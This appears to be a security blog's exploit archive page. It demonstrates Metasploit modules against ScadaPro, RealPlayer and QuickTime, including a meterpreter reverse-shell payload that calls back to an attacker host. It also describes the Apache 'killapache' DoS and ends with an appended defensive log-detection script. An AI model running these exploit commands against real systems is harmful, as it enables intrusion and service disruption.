Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

EDB-ID-17848 : Measuresoft ScadaPro Remote Command Execution Metasploit Demo

Timeline :

Vulnerability discovered by Luigi Auriemma
Public release of the vulnerability on 2011-09-13
Metasploit PoC provided on 2011-09-16

PoC provided by :

Luigi Auriemma
mr_me
TecR0c

Reference(s) :

EDB-ID-17848

Affected version(s) :

All Measuresoft ScadaPro before version 4.0.1

Tested on Windows XP SP3 with :

Measuresoft ScadaPro 3.9.15.0 / 3.1.9

Description :

This module allows remote attackers to execute arbitrary commands on the affected system by abusing a directory traversal flaw in the ‘xf’ (execute function) command. An attacker can call system() from msvcrt.dll to upload a backdoor and gain remote code execution.

Commands :

use exploit/windows/scada/scadapro_cmdexe
set RHOST 192.168.178.78
exploit

getuid
sysinfo

CVE-2011-2950 : RealNetworks RealPlayer QCP Parsing Heap Overflow Metasploit Demo

Timeline :

Vulnerability discovered by Sean de Regge and submitted to ZDI
Vulnerability reported to the vendor by ZDI on 2011-04-01
Coordinated public release of the vulnerability on 2011-08-16
Metasploit PoC provided on 2011-09-16

PoC provided by :

Sean de Regge
juan vazquez

Reference(s) :

CVE-2011-2950
ZDI-11-265
OSVDB-74549

Affected version(s) :

RealPlayer 11.0 – 11.1
RealPlayer SP 1.0 – 1.1.5
RealPlayer 14.0.0 – 14.0.5

Tested on Windows XP SP3 with :

Internet Explorer 7.0.5730.13
Apple RealPlayer 14.0.2.633

Description :

This module exploits a heap overflow in RealPlayer when handling a .QCP file. The specific flaw exists within qcpfformat.dll. A static 256-byte buffer is allocated on the heap and user-supplied data from the file is copied into it within a memory copy loop. This allows a remote attacker to execute arbitrary code in the context of the web browser via a .QCP file with a specially crafted “fmt” chunk. At the moment this module exploits the flaw on Windows XP with IE6 and IE7.

Commands :

use exploit/windows/browser/realplayer_qcp
set SRVHOST 192.168.178.21
exploit
getuid
sysinfo

CVE-2011-0257 : Apple QuickTime PICT PnSize Buffer Overflow Metasploit demo

Timeline :

Vulnerability discovered by Matt “j00ru” Jurczyk and submitted to ZDI
Vulnerability reported to the vendor by ZDI on 2011-04-11
Coordinated public release of the vulnerability on 2011-08-08
Metasploit PoC provided on 2011-09-03

PoC provided by :

MC

Reference(s) :

CVE-2011-0257
ZDI-11-252

Affected version(s) :

All Apple QuickTime Player versions prior to 7.7

Tested on Windows XP SP3 with :

Apple QuickTime Player 7.6 (472)

Description :

This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code.

Commands :

use exploit/windows/fileformat/apple_quicktime_pnsize
set FILENAME hollidays.mov
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

getuid
sysinfo

CVE-2011-3192 : Apache HTTPD Killer Remote Denial of Service

Kingcope released, on 19 August, on the Full Disclosure mailing list a Perl script named “killapache.pl” that can cause a remote denial of service (DoS) against Apache HTTPD web servers. The attacker can carry out the DoS with few resources (CPU, memory and bandwidth) while causing the targeted web server to consume a large amount of resources (CPU and memory). The Apache HTTPD 2.0 and 2.2 series are affected by this vulnerability. The issue in Apache HTTPD was previously discovered by Michal Zalewski in January 2007. The Apache Foundation proposes mitigation options until a patch is released.

Execution of the “killapache.pl” script on the attacker box.

Resources consumed on the attacker box after “killapache.pl” execution.

Resources consumed on the target server after “killapache.pl” execution.

In the target server's Apache HTTPD logs, you can see entries like these.

xxx.xxx.xxx.xxx - - [24/Aug/2011:17:19:37 +0200] "HEAD / HTTP/1.1" 206 345 "-" "-"
xxx.xxx.xxx.xxx - - [24/Aug/2011:17:19:37 +0200] "HEAD / HTTP/1.1" 206 354 "-" "-"
xxx.xxx.xxx.xxx - - [24/Aug/2011:17:19:37 +0200] "HEAD / HTTP/1.1" 206 354 "-" "-"
xxx.xxx.xxx.xxx - - [24/Aug/2011:17:19:37 +0200] "HEAD / HTTP/1.1" 206 354 "-" "-"
xxx.xxx.xxx.xxx - - [24/Aug/2011:17:19:37 +0200] "HEAD / HTTP/1.1" 206 354 "-" "-"
xxx.xxx.xxx.xxx - - [24/Aug/2011:17:19:37 +0200] "HEAD / HTTP/1.1" 206 354 "-" "-"

The script sends HTTP HEAD requests, but the DoS also works with GET or POST requests.
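As an added, defender-side example that is not part of the original post: a small log triage script, run over constructed sample lines in the same combined-log format as the excerpt above, that flags sources drawing many 206 (Partial Content) responses within a single second, which is what the Range-based requests of this DoS leave behind. The test addresses (192.0.2.10, 198.51.100.7) and the threshold of 5 are assumptions.

```python
import re
from collections import defaultdict

# Apache combined log format, as in the excerpt in the post above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample lines (RFC 5737 test addresses), shaped like the post's excerpt:
# one source hammering "/" with HEAD and getting 206 back, plus ordinary traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [24/Aug/2011:17:19:37 +0200] "HEAD / HTTP/1.1" 206 345 "-" "-"
192.0.2.10 - - [24/Aug/2011:17:19:37 +0200] "HEAD / HTTP/1.1" 206 354 "-" "-"
192.0.2.10 - - [24/Aug/2011:17:19:37 +0200] "HEAD / HTTP/1.1" 206 354 "-" "-"
192.0.2.10 - - [24/Aug/2011:17:19:37 +0200] "HEAD / HTTP/1.1" 206 354 "-" "-"
192.0.2.10 - - [24/Aug/2011:17:19:37 +0200] "HEAD / HTTP/1.1" 206 354 "-" "-"
192.0.2.10 - - [24/Aug/2011:17:19:37 +0200] "HEAD / HTTP/1.1" 206 354 "-" "-"
198.51.100.7 - - [24/Aug/2011:17:19:38 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Aug/2011:17:19:39 +0200] "GET /video.mp4 HTTP/1.1" 206 65536 "-" "VLC/1.1"
"""


def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_range_bursts(lines, threshold=5):
    """Return {(ip, timestamp): count} for sources that drew `threshold` or more
    206 responses within the same second. The method is not filtered on purpose:
    as the post notes, the DoS works with HEAD, GET or POST alike."""
    counts = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == "206":
            counts[(rec["ip"], rec["ts"])] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for (ip, ts), n in find_range_bursts(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {n} partial-content responses at {ts}")
```

A single legitimate 206 (the media download from 198.51.100.7) stays below the threshold, so only the burst from 192.0.2.10 is reported.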